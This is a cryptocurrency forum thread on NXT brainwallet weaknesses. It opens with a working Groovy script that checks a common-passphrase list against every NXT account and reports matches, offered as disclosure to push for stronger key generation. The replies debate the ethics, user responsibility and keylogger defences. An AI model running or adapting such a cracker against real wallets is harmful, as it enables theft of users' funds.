brainwallets need to go

[doctorevil]

Code: [Select]

import java.io.*;
def objIn = new ObjectInputStream(new FileInputStream("transactions.nxt"));
objIn.readInt();
def accounts = new HashSet();
objIn.readObject().each{
    accounts.add(Nxt.convert(it.value.recipient).toString());
}
BufferedReader stdin = new BufferedReader(new InputStreamReader(System.in));
while ((line = stdin.readLine()) != null ) {
    def user = new Nxt.User();
    def accountId = user.initializeKeyPair(line);
    if ( accounts.contains(accountId.toString()) ) {
        System.out.println("found " + accountId + " " + line);
    }
}

This 15-line groovy single-threaded cracker recovers about 1.5% of all keys ever used in less than an hour using a common passphrase list.

IMHO NXT has a lot of good ideas, but it's brainwallet-based key management solution is a near unforgivable design blunder.

Blaming users who get their NXT stolen for picking a bad passphrase is a bit of a cop-out.  The design forces people to run with scissors.  Best practice is to generate keys on behalf of users that satisfy standard entropy requirements.  If you want the output to be friendly looking use electrum-style mnemonic encoding.  The standard counter-argument is that this forces users to write their passphrase down or save it to a file instead of remembering it.  Humans are so bad at recalling/picking passphrases and cracking is so easy (and getting easier) that this is clearly the lesser of two evils.  Especially so because many otherwise technically sophisticated users are prone to conflate passphrase length with security.

Brainwallets are nifty conceptually, but they belong as a power-user feature.  Not the default.  A default key management solution that dooms 1.5% (probably more if I ran the cracker on a larger list) of users out of the gate is a huge problem.

Some may question if it's ethical to post this code as opposed to simply arguing my case; here's my thinking:

• I wrote this as an exercise after seeing the recent reports of thefts, suspecting they were all caused by predictable passphrases (despite the victims claiming their passphrases were long) and wished to confirm this hypothesis.
• There's value in showing cracking software is trivial - both as a warning to users to pick better passwords and an inducement to developers to change the default key management solution.
• The fact that it's so trivial means I saved a would-be hacker all of 15-lines of work.
• A total script kiddie without understanding of classpath bullshit still won't be able to run it so it's not like I'm unleasing 100% out of the box chaos.

[hughmanwho]

I agree that this is a big issue.  The new clients coming out should allow using any password but have some kind of feature like this, similar to the way blockchain.info manage their wallets.

Also, if I were you I'd remove that program.. it clearly is a relatively easy to write program but there are people out there who I could see downloading it and running who otherwise might not go to the trouble of writing their own.  Point is made that you were able to make a fairly simple program within a couple hours that can steal passphrases.  Honestly, since no one would ever know I stole the money.. I'm tempted to do it myself.

[hoolio]

Do I need to compile this code to run it? 

[Zahlen]

Thanks for doing this doctorevil. It's a good thing (despite your nick ) we know about this so early.

As I understand it, the design philosophy has been to keep the protocol clean, and place protections in the clients instead. Hence e.g. the lack of address checksums, 2FA support in the protocol. Trouble is the protocol came first with a basic, unprotected reference client. People then bought into a beta, some accepted the associated risks with that and did their homework first, some didn't. And it takes time after that for more advanced clients to be developed. The client devs have been working on ways to strengthen passwords, e.g. key stretching, wallet-like key file.

I started a wiki page on how to generate strong passwords, but it seems to have not received much attention. Would appreciate it if folks pointed more people to it, since I don't have time to trawl so many forums. And would also appreciate edits and comments in the discussion page.

[farl4bit]

What are the alternatives to the current brainwallets? 

[ZeroTheGreat]

What are the alternatives to the current brainwallets? 

Only NRS-client trustworthy enough for me for now. So no alternatives (in my estimation). Keep waiting.

[EmpireCloud]

Thanks Dr. Evil your post makes the problem quite clear.

In my own situation, I'm not expecting to be able to spend my NXT on real world stuff for a few months yet, so I can make a strong password and then not access my account till then.

The problem comes with forging. At the moment I'm not forging because I don't want to type in that password every time I turn on my computer because if I have a keylogger or something then it's a certainty my NXT will get stolen.

I guess in future there will be other alternatives & things similar to armory where you can log in offline etc. to help with that.

[CryptKeeper]

Thank you Dr. Evil for bringing this up. I think, this must be addressed asap!

Look how the solaris client implemented it, this is a good start! Waiting for the solaris source to be released, I am currently using the NRS client, so I had to manage security myself. I am using keepass like a bitcoin wallet and created a random 60-character-passphrase, which I paste into the NRS client and never type manually.

Maybe a bitcoin-wallet-type management of the passphrase is the way to go for Nxt...

[Come-from-Beyond]

It's a cryptocurrency. People shouldn't use things they don't understand.

[farl4bit]

It's a cryptocurrency. People shouldn't use things they don't understand.

But we want Nxt to be big and be used by the whole world? It should be user-friendly to get great acceptation.

[LemonAndFries]

If a simple keylogger is your worry then do the following:

Create a TXT file somewhere you know is safe and doesn't have malware.
Send TXT file to your computer where you want to forge.
Every time you open your account, just copy and paste passphrase.
Keylogger will only log the clicks of your mouse.

If keyloggers have advanced much more, then someone can correct my info.

[TeamWealth]

That really wouldnt work lemonandfries. It would work vs the absolute most basic which just logs key strokes and mouse strokes, but useless vs more advanced which log alot more including copy and paste. It really isnt that hard to intercept copy and paste actions.

[LemonAndFries]

That really wouldnt work lemonandfries. It would work vs the absolute most basic which just logs key strokes and mouse strokes, but useless vs more advanced which log alot more including copy and paste. It really isnt that hard to intercept copy and paste actions.

Yeah I'd figure that it could intercept the data also.  I'd still do it like that just in case the malware has a primitive keylogger.
Either way, people should have up to date malware removers and check their running processes for anything unusual.
It's not 100% protection, but it's better than doing nothing.

[ZeroTheGreat]

But we want Nxt to be big and be used by the whole world?

I dunno what u want, I wanna all users're having basic knowledge of risks of such instrument as cryptocurrency.

"You — your own bank".

[Leteu]

If a simple keylogger is your worry then do the following:

Create a TXT file somewhere you know is safe and doesn't have malware.
Send TXT file to your computer where you want to forge.
Every time you open your account, just copy and paste passphrase.
Keylogger will only log the clicks of your mouse.

If keyloggers have advanced much more, then someone can correct my info.

This is total BS. ALL (software) keyloggers can capture the clipboard. This gives you no protection against keyloggers.

Far better would be to use this  (it's called neo safe keyboard)

http://www.aplin.com.au/neos-safekeys-v3/how-neos-safekeys-v3-works

and make sure you use drag and drop to transfer the password  (not inject "option" as that will allow the capture of password by keyloggers).